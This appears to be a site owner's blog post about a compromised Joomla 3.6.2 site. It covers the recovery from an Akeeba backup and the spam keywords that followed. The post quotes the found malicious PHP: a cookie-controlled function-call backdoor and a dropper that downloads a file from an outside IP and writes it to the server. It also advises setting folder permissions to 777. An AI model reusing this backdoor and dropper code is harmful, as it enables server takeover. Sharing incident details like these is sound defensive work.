Had a recent Joomla 3.6.2 install go blank. Site was fine one day and the next it was unreachable.
I FTP’ed into the site and I see WordPress folders in there and other strange files. There was a zip file called “cms brute rmf 3.0.zip”. Thre were odd PHP files such a “ebb6bff35a.php”. Look like an attack for sure. The PHP file was extremely complex.
The file “ebb6bff35a.php” starts out by grabbing the id set in a cookie for “user id” then points back the following ip with the cookie information. This IP stems from Belize.
if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);
if( isset($_REQUEST[“test_url”]) ){
echo “file test okay”; }
$f =$_GET[“d”];
$id=$f;
$current = file_get_contents(“http://80.87.205.79/$f”);
file_put_contents($id, $current);
if (!defined(‘PCLZIP_READ_BLOCK_SIZE’)) {
define( ‘PCLZIP_READ_BLOCK_SIZE’, 2048 );
}

Hopefully I can figure out what happen, but I am worried about security for sure.
After contacting Godaddy it looks like a complete attack. Uploaded PHP files, directories were created, and I didn’t get to check the database. Had to do a GoDaddy account reset and restore from an Akeeba backup.
The backup didn’t go well I got the following error.

I followed the instructions on this page.
https://www.akeebabackup.com/documentation/troubleshooter/kscantextract.html
I had to create the “kicktemp” folder. Set the permissions to 777. Set the type of install to FTP. For the root directory I had to use “/”. Make sure to test the FTP connection.
The Kickstart restore took about 25 minutes to restore.
Here are the specs on the site.
- Joomla 3.6.2
- JCE
- Akeeba
- Chronoforms
- JO Facebook Events Pro
- Hot Themes Hot Fitness template.
One of the worst parts of this whole debacle is their SEO. The site was live for a month before the attack and the analytics were clicking along nicely. The site was getting around 300 plus hits a in the first month with around 100 key word matches.
During the attack the number of key word matches jumped to 16,000 matches and incredibility junky results.

This is a running store and have nothing to do with “sexy turkey”. This all happened in just a few days. I really hope this doesn’t offend Google and they decide to block the site.
I hope this helps someone else out there…
Follow up:
A month later after this attack I looked at all of the directories and found no trace of another attack.